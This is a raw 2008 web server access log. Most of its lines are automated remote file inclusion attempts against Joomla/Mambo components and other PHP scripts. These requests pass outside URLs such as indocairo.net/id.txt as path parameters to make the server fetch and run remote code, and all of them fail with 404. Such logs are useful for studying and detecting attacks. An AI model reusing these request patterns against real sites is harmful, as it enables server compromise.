80.247.64.150 - - [10/Sep/2008:05:37:15 -0400] "GET /logs/access_log.Q108081600//admin/classes/errors.php?error=http://www.capletonmusic.com/subdirectories/id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
207.44.236.14 - - [10/Sep/2008:05:37:28 -0400] "GET /logs/error_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://indocairo.net/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
216.55.155.50 - - [10/Sep/2008:05:38:14 -0400] "GET /logs/error_log.Q108081700//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://indocairo.net/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Sep/2008:05:39:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.44.236.14 - - [10/Sep/2008:05:39:28 -0400] "GET /logs/access_log.Q108070500//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:39:32 -0400] "GET /logs/error_log.Q108082500//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:39:32 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:39:32 -0400] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
216.55.155.50 - - [10/Sep/2008:05:41:24 -0400] "GET /logs/error_log.Q108022400//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
216.55.155.50 - - [10/Sep/2008:05:41:24 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.55.155.50 - - [10/Sep/2008:05:41:24 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.55.155.50 - - [10/Sep/2008:05:42:05 -0400] "GET /logs/error_log.Q108052900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:42:36 -0400] "GET /logs/access_log.Q108072000//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
207.44.236.14 - - [10/Sep/2008:05:42:42 -0400] "GET /logs/error_log.Q108072300//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:42:42 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
207.44.236.14 - - [10/Sep/2008:05:42:42 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
64.255.237.141 - - [10/Sep/2008:05:42:52 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
64.255.237.141 - - [10/Sep/2008:05:42:53 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
217.133.215.166 - - [10/Sep/2008:05:43:10 -0400] "GET /logs/error_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 300 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.133.215.166 - - [10/Sep/2008:05:43:11 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.133.215.166 - - [10/Sep/2008:05:43:39 -0400] "GET /logs/error_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 300 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.133.215.166 - - [10/Sep/2008:05:43:40 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.243.169.10 - - [10/Sep/2008:05:43:54 -0400] "GET /logs//playing.php?commonpath=http://www.prodigyfish.com/readme.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.255.237.141 - - [10/Sep/2008:05:43:55 -0400] "GET /logs/access_log.Q108072200//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indocairo.net/id.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.243.169.10 - - [10/Sep/2008:05:44:00 -0400] "GET /logs/error_log.Q108082300%20%20//playing.php?commonpath=http://www.prodigyfish.com/readme.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Sep/2008:05:44:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.133.215.166 - - [10/Sep/2008:05:44:29 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 301 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.247.64.150 - - [10/Sep/2008:05:44:32 -0400] "GET /logs/access_log.Q108082100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.capletonmusic.com/subdirectories/id.tx